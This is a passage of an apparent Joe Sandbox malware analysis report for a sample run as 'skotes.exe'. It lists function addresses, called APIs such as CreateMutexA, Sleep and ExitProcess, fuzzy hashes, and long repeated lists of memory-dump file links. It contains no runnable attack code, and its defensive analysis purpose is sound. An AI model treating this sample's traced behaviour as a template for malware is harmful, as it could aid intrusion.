Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: c4c418b07dba8cd147d2a0c1e6e24190b943abe6a080375968880adb30f1871e
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: BCE08C32921228EBCB14DB98C904E8AF7ECEB49B05B6501D6F901E3150C270DE08C7D4

Function 00B22EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00B22F5F
__Mtx_unlock.LIBCPMT ref: 00B22FCC
__Cnd_broadcast.LIBCPMT ref: 00B22FE3
__Mtx_unlock.LIBCPMT ref: 00B230F5
__Mtx_unlock.LIBCPMT ref: 00B2319B

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
Instruction ID: 4707a41b1139a36722ef6fd2bf6e06cdd5d464c32c5a3894ebcb288d7a0206fb
Opcode Fuzzy Hash: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
Instruction Fuzzy Hash: E4A103B0A00225AFDB10DFA4D945B5BBBF8FF15710F1441A9E819E7241EB39EA14CBE1

Function 00B5CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B5CC66

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: 051be88c314246b39a03a0804e465bda222bde4938d997b6e871e03877dafd82
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: 82B104329043859FDB158F28C8817AEBFF6EF55341F1441EADC55EB281D6349D4ACB90

Function 00B3BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00B3BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BBE4
_xtime_get.LIBCPMT ref: 00B3BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BC13

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
Instruction ID: b8eaf973e389c6ea05cfc3bb2049241c88ba815987ca7a4790556c935f2195b9
Opcode Fuzzy Hash: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
Instruction Fuzzy Hash: 10211071900119AFDF00EBA4D8829BEBBB9EF48710F600055F605B7251DB30AD459B90

Analysis Process: skotes.exePID: 7596, Parent PID: 7276COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	617
Total number of Limit Nodes:	4

Executed Functions

Function 00F6652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00F6652A,?,?,?,?,?,00F67661), ref: 00F66567

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2551285c3165bd679da4ac31563c6f8914407b56742c46940d1cf4f31abe68a1
Instruction ID: fbc0be08a5cb0316ab048559534cbad5e4509637ca5df7feb6f9e764ec2ce9fd
Opcode Fuzzy Hash: 2551285c3165bd679da4ac31563c6f8914407b56742c46940d1cf4f31abe68a1
Instruction Fuzzy Hash: 7FE0C230000208AFCF357B18DC4BE583B69EF42755F540840FD09C6222CB39ED91FA90

Function 00F39BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
